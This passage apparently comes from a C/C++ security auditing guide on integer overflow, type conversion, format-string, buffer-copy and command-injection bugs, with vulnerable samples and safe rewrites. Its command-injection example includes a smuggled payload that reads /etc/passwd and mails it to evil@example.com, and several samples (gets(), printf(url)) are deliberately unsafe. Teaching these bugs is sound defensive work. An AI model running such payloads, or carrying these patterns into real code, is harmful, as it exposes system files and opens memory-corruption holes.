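Callers then allocate only on success, e.g. `if (!checked_mul(nresp, sizeof(char *), &n)) fail(); buf = xmalloc(n);`. Compiler builtins such as GCC/Clang's `__builtin_mul_overflow` offer the same check without the division.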
- 4.2 Signed Integer Boundaries (Overflow/Underflow)
- Description: Signed integer overflow/underflow behavior is technically undefined in C/C++, but often wraps around (implementation-defined). Can be exploited to bypass security checks, especially those comparing against maximum size limits. Adding 1 to MAX_INT can result in MIN_INT (negative).
- Example (Bypassing Length Check):
```c
// From Art of VR description
#define MAXCHARS 1024
int length = 0x7FFFFFFF;                  // Maximum signed int
// Check 1: length < 0             -> false
// Check 2: length + 1 >= MAXCHARS
//          0x7FFFFFFF + 1 wraps to 0x80000000 (INT_MIN, negative)
//          negative >= MAXCHARS   -> false
// Both checks bypassed!
if (length < 0 || length + 1 >= MAXCHARS) { /* error */ }
// read(sockfd, buf, length);             // read called with a huge length
```
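Because signed overflow is undefined, the guard itself must never compute `length + 1`. One way to write the check so it cannot overflow is to move the constant to the other side of the comparison (a sketch; `length_ok` is an illustrative name, not from the original code):

```c
#include <limits.h>

#define MAXCHARS 1024

/* Rejects negative lengths and any length for which length + 1 would
   reach MAXCHARS, without ever performing the addition. */
int length_ok(int length) {
    return length >= 0 && length < MAXCHARS - 1;
}
```

`length < MAXCHARS - 1` is equivalent to the intended `length + 1 < MAXCHARS` for all non-negative values, but stays well-defined even when `length` is `INT_MAX`.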
5. Type Conversion Vulnerabilities
- 5.1 Signed/Unsigned Conversion Issues
- Description: Implicit conversions between signed and unsigned types, often during comparisons or assignments. Passing negative signed integers to functions expecting unsigned sizes (`size_t`) results in large positive values. Comparisons between signed and unsigned types usually promote the signed operand to unsigned, potentially bypassing checks.
- Rule: If operands include a floating-point type, convert to that type. Otherwise, perform integer promotions (char/short -> int). If the types still differ, convert the operand of lower rank to the type of higher rank; if the ranks are equal and one operand is unsigned, convert the signed operand to unsigned.
- Example (Comparison Promotion):
```c
int jim = -5;
// sizeof(int) has type size_t (unsigned), which outranks signed int,
// so jim is converted to unsigned before the comparison.
if (jim < sizeof(int))     // Effectively: (unsigned)-5 < 4 -> false
    do_something();        // Will likely NOT be called
```
- Auditing Tip: Look for signed integers passed to functions expecting `size_t` (`read`, `memcpy`, `malloc`, `strncpy`, etc.). Check comparisons involving mixed signed/unsigned types, especially against `sizeof` or `strlen` results.
- 5.2 Sign Extension
- Description: Converting a smaller signed type (char, short) to a larger signed type (int, long) copies the sign bit into the new higher-order bits. A negative char (-1, 0xFF) becomes a negative int (-1, 0xFFFFFFFF). Can cause issues if the extended value is used in calculations or passed to functions expecting unsigned values.
- Example (Passed to snprintf):
```c
char len = -1;                    // Value 0xFF, perhaps from the network
// len is promoted to int 0xFFFFFFFF (-1)
snprintf(dst, len, "%s", src);    // snprintf receives a negative size
```
- Example (DNS Packet Parsing):
```c
// Conceptual, from the Art of VR BIND example
char count = (char)*indx;         // Read a length byte as signed char
// If count is negative (e.g., -1 / 0xFF), sign extension occurs when it
// is used in contexts expecting int:
// strncat(nameStr, (char *)indx, count);  // count promoted to int -1
// If the size parameter interprets -1 as a huge unsigned value -> overflow
```
- Auditing Tip: Focus on signed `char` or `short` values used in contexts that promote them to `int` (arithmetic, comparisons, function arguments). In assembly, look for the `movsx` instruction.
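Sign extension is easy to observe directly. A small sketch (assumes two's-complement representation, the near-universal case; function names are illustrative):

```c
/* Converting signed char to int replicates the sign bit into the upper
   bits, so byte 0xFF becomes -1 (0xFFFFFFFF). The same byte read through
   an unsigned char is zero-extended to 255 instead. */
int extend_signed(signed char c)     { return c; }
int extend_unsigned(unsigned char c) { return c; }
```

This is why length bytes parsed from network data should be read through `unsigned char`: the unsigned version can never yield a negative count.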
- 5.3 Truncation
- Description: Converting a larger integer type to a smaller type discards the most significant bits. Can bypass size checks if a large value is truncated to a small one before the check or copy.
- Example (strlen result truncated):
```c
unsigned short f;              // 16-bit
char mybuf[1024];
char *userstr = getuserstr();  // Assume this returns a string > 65535 chars
// strlen returns size_t (32/64-bit); suppose the length is 66000.
f = strlen(userstr);           // Truncation: f becomes 66000 % 65536 = 464
if (f > sizeof(mybuf) - 5)     // Check is 464 > 1019 -> false
    die("string too long!");
strcpy(mybuf, userstr);        // Check bypassed: userstr overflows mybuf
```
- Auditing Tip: Look for assignments from larger types (`int`, `size_t`) to smaller types (`short`, `char`), especially when the value is a length or size. Check struct definitions for narrow length fields.
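The arithmetic behind the example above: narrowing to an unsigned 16-bit type keeps only the value modulo 65536. A one-line sketch (assumes the usual 16-bit `unsigned short`; the helper name is illustrative):

```c
/* Narrowing conversion to unsigned short discards the high bits,
   i.e. computes the value mod 65536 (given 16-bit unsigned short). */
unsigned short truncate16(unsigned long v) { return (unsigned short)v; }
```

So a 66000-byte string passes a check written against the truncated length of 464, exactly as in the `strlen` example.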
- 5.4 Comparisons
- Description: Implicit type conversions during comparisons are a major source of bugs. Promotion of signed to unsigned is common when comparing against `size_t` or other unsigned types.
- Example (Signed vs. Unsigned size_t):
```c
short length = 1;                        // From the network
// sizeof(short) has type size_t (unsigned). In (length - sizeof(short)),
// length is promoted to int and then converted to unsigned size_t, so the
// result of the subtraction is unsigned.
if (length - sizeof(short) <= 0)         // Unsigned result is never < 0
    { /* ineffective for small positive lengths */ }
// read(sockfd, buf, length - sizeof(short));
// If length == 1, the read size becomes (unsigned)(1 - 2) = a huge value.
```
- Example (Signed vs Unsigned Max Check):
```c
unsigned short max = 1024;
short length = -5;                // From the network
// Both operands are promoted to int, so the check is effectively
// (-5 > 1024) -> false. Check bypassed.
if (length > max) { /* error */ }
// read(sockfd, buf, length);     // Negative length -> huge unsigned size_t
```
- Auditing Tip: Scrutinize comparisons that protect memory operations. Track variable types carefully, watching for `sizeof` and `strlen`. Comparisons like `if (unsigned_var < 0)` are suspicious.
- 5.5 Operators
- Subtraction: Integer promotions happen before the operation. `(unsigned short)1 - 5` is calculated as `(int)1 - (int)5 = -4`. The result type affects subsequent comparisons or assignments.
- Division/Modulus: Signed division and modulus with negative operands can yield negative results (implementation-defined prior to C99; typically rounds toward zero or toward negative infinity). If a negative result feeds a size calculation (e.g., `malloc(len/8 + 1)`), it can lead to allocating zero or a small amount, followed by operations that assume a larger buffer.
- Right Shift: Right-shifting (`>>`) a signed negative value performs an arithmetic shift, preserving the sign bit (filling with 1s). If a logical shift (filling with 0s) was expected, this can produce unexpectedly large negative or positive values depending on context. Check the assembly: `sar` (arithmetic) vs. `shr` (logical).
- Auditing Tip: Check the operands of signed division, modulus, and right shift. Can user input make an operand negative?
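The operator rules above can be demonstrated directly. A minimal sketch (assumes the common model of 16-bit `short` and 32-bit two's-complement `int`; function names are illustrative):

```c
/* Integer promotion: both operands become int BEFORE the subtraction,
   so the result can be negative even though the left operand is an
   unsigned short. */
int promoted_sub(unsigned short a, int b) {
    return a - b;                   /* computed as (int)a - b */
}

/* Arithmetic vs. logical shift: on a negative int, >> typically
   replicates the sign bit (compilers emit sar); on an unsigned value,
   >> always shifts in zeros (shr). */
int      arith_shift(int v)      { return v >> 4; }
unsigned logic_shift(unsigned v) { return v >> 4; }
```

When auditing, the dangerous pattern is a signed value from untrusted input flowing into `>>` or `/` inside a size computation: the result may be negative where the author assumed it could only shrink toward zero.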
6. Information Disclosure
- 6.1 Memory Disclosure
- Description: Leaking contents of memory, often due to missing bounds checks on reads, use of uninitialized memory, or incorrect handling of internal data structures. Heartbleed (OpenSSL) was a famous example where missing bounds check allowed reading arbitrary server memory.
- Example: (Conceptual based on cheatsheet description of OpenSSL flaw)
```c
// If SSL_read has an internal flaw that lets it read past the intended
// data (error-condition mishandling or a bad length calculation), the
// buffer may end up containing adjacent memory contents.
bytes_read = SSL_read(ssl, buffer, sizeof(buffer));
// Printing or transmitting 'buffer' then leaks unintended data.
```
- 6.3 Debug Information Leakage
- Description: Accidentally exposing internal state, variable values, or verbose logs intended only for debugging. Often happens when debug code is left enabled in production builds or triggered by specific inputs.
- Example: (Conceptual based on cheatsheet description of curl flaw)
```c
// If curl's URL parser had a flaw where a crafted URL triggered verbose
// debug output intended for developers, that output might leak internal
// state or sensitive data processed by curl.
curl_easy_setopt(curl, CURLOPT_URL, malicious_url);
curl_easy_perform(curl);          // Debug info printed to console/log
```
7. Cryptographic Weaknesses
- 7.1 Weak Encryption Algorithm
- Description: Using cryptographic algorithms known to be weak or compromised (e.g., DES, MD5 for hashing passwords, RC4 in some contexts). Does not provide adequate confidentiality or integrity against modern attacks.
- Example: (Conceptual based on cheatsheet description of PHP mcrypt)
```c
// Using MCRYPT_DES makes the encryption vulnerable (56-bit key).
// Prefer stronger algorithms such as AES (e.g., MCRYPT_RIJNDAEL_128).
td = mcrypt_module_open(MCRYPT_DES, ...);
```
- 7.2 Predictable Random Number Generation
- Description: Using pseudo-random number generators (PRNGs) that are improperly seeded or inherently weak, allowing attackers to predict their output. Critical for session tokens, cryptographic keys, nonces, etc. Seeding with predictable values like the time or process ID is insecure. Use cryptographically secure PRNGs (CSPRNGs) provided by the OS or crypto libraries.
- Example: (Conceptual based on cheatsheet description of OpenSSL flaw)
```c
// If RAND_bytes() relies on PRNG state that was not seeded with enough
// entropy (e.g., from /dev/urandom or the platform equivalent), its output
// may be predictable, especially on embedded systems or VMs right after boot.
if (!RAND_bytes(random_bytes, sizeof(random_bytes))) { /* error */ }
```
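The core problem is determinism: a PRNG seeded with a guessable value replays the same stream for anyone who guesses the seed. A deliberately weak sketch (the `weak_token` helper is illustrative, not a real API):

```c
#include <stdlib.h>

/* Anti-pattern: a "token" derived from a guessable seed (such as a
   timestamp or PID). Anyone who can guess the seed reproduces the
   exact same token offline. */
unsigned int weak_token(unsigned int seed) {
    srand(seed);                   /* predictable seed -> predictable stream */
    return (unsigned int)rand();
}
```

An attacker who narrows the request time to a few thousand candidate seeds can brute-force such a token trivially. Use an OS CSPRNG instead: `getrandom(2)` on Linux, `arc4random(3)` on BSD/macOS, or `RAND_bytes` from a properly seeded OpenSSL.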
8. String Vulnerabilities
- 8.1 Format String Vulnerabilities
- Description: User input controls the format string argument to a `printf`-family function. Allows reading stack memory (`%x`), dereferencing pointers (`%s`), and writing to memory (`%n`).
- Example: (Conceptual, based on cheatsheet curl example)
```c
// If url is "http://example.com/%x%x%n" and is somehow passed as the
// format string of a printf-like function internally:
printf(url);         // Vulnerable if url comes from the user
printf("%s", url);   // Safe: url is treated as data, not as a format string
```
- Auditing Tip: Search for `printf`, `sprintf`, `syslog`, etc. with non-static format strings, and trace them back to user input.
- 8.2 Unbounded String Copies
- Description: Using functions like `strcpy`, `strcat`, `sprintf` (no size limit), or `gets` that don't prevent writing past the end of the destination buffer.
- Example:
```c
char Password[80];
// gets() is inherently unsafe: it reads until newline, regardless of the
// buffer size.
gets(Password);       // Classic stack buffer overflow if input > 79 chars
```
- Algorithm:
```
type STRING[SIZE]
func_read_unbounded(STRING)    // input copied > SIZE
```
- 8.3 Null-Termination Errors
- Description: Strings not properly terminated with a null character (`\0`). Functions relying on NUL termination (like `strlen`, `strcpy`, `printf` with `%s`) will read past the intended end of the string data into adjacent memory. Can happen with `strncpy` when the source length is >= the destination size.
- Example:
```c
char a[16];
char b[16];
char c[32];
// strncpy does not null-terminate when the source length >= the dest size.
strncpy(a, "0123456789abcdef", sizeof(a));  // a may not be null-terminated
strncpy(b, "0123456789abcdef", sizeof(b));  // b may not be null-terminated
// Since a is not null-terminated, strcpy reads past the end of 'a' into
// 'b' and beyond.
strcpy(c, a);        // Potential read overflow if 'a' wasn't terminated
```
- Algorithm: (interpreted: copy without ensuring null termination)
```
type DEST[SIZE_DEST], SRC[SIZE_SRC]              // where SIZE_SRC >= SIZE_DEST
func_bounded_copy_no_term(DEST, SRC, SIZE_DEST)  // DEST may not have '\0'
func_read_terminated(DEST)                       // reads past end of DEST
```
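A common remedy is to force termination after every bounded copy. A minimal sketch in the spirit of BSD's `strlcpy` (the helper name `copy_terminated` is illustrative):

```c
#include <string.h>

/* Bounded copy that always null-terminates the destination.
   Silently truncates if src does not fit in dst_size - 1 bytes. */
void copy_terminated(char *dst, const char *src, size_t dst_size) {
    if (dst_size == 0)
        return;
    strncpy(dst, src, dst_size - 1);   /* leave room for the terminator */
    dst[dst_size - 1] = '\0';          /* guarantee termination */
}
```

Where available, `strlcpy` (BSD) or `snprintf(dst, size, "%s", src)` achieve the same guarantee; the auditing question is whether every `strncpy` call site either terminates explicitly like this or provably copies fewer bytes than the destination holds.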
- 8.4 String Truncation
- Description: Cutting a string short, often via bounded copy functions (`strncpy`, `snprintf`). Can be a vulnerability if critical data is lost (e.g., path components, security suffixes) or if subsequent code assumes the full string was processed. `snprintf` returns the number of bytes that would have been written, so the return value must be checked against the buffer size to detect truncation. Also relates to null-termination errors if truncation prevents the null byte from being written.
- Example:
```c
char destination[5];
char source[] = "This is a long string";
// Copies only the first 5 bytes: "This ". No null terminator is written,
// because the source length >= the destination size.
strncpy(destination, source, sizeof(destination));
// printf reads past the end of 'destination' into adjacent memory.
printf("%s\n", destination);
```
- Algorithm:
```
type SOURCE[], DEST[SIZE]                    // SOURCE length >= SIZE
func_safe_copy_truncates(DEST, SOURCE, SIZE) // DEST holds first SIZE bytes
                                             // of SOURCE, maybe no '\0'
use(DEST)                                    // later use assumes full string
                                             // or expects '\0'
```
- 8.5 Improper Data Sanitization (Command/SQL/Path Injection)
- Description: Failing to validate, sanitize, or escape user-controlled input that is used to construct commands, queries, file paths, or other strings with special syntax (metacharacters). Allows attackers to inject malicious syntax.
- Example (Command Injection):
```c
char buffer[200];
// User-controlled input containing shell metacharacters:
char *addr = "bogus@addr.com; cat /etc/passwd | mail evil@example.com";
// The command string is built with unsanitized input...
sprintf(buffer, "/bin/mail %s < /tmp/email", addr);
// ...so the shell executes:
//   /bin/mail bogus@addr.com; cat /etc/passwd | mail evil@example.com
system(buffer);
```
- Algorithm:
```
type DATA = user_input_with_metachars
type COMMAND = construct_string("cmd ", DATA)
func_exec(COMMAND)
```
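One mitigation is to validate the input against a strict allowlist before it ever reaches a command string; the stronger fix is to avoid the shell entirely (`fork` + `execve` with a fixed argv, so metacharacters are never interpreted). A sketch of the allowlist approach (the character set and helper name are illustrative):

```c
#include <string.h>

/* Accept only characters plausible in a plain e-mail address, so shell
   metacharacters like ';', '|', '$', and whitespace are rejected before
   the string can reach system(). */
int is_safe_addr(const char *s) {
    static const char ok[] =
        "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "0123456789.@_+-";
    return *s != '\0' && strspn(s, ok) == strlen(s);
}
```

Allowlists beat denylists here: rather than enumerating every dangerous metacharacter for every shell, the check names the small set of characters the application actually needs and rejects everything else.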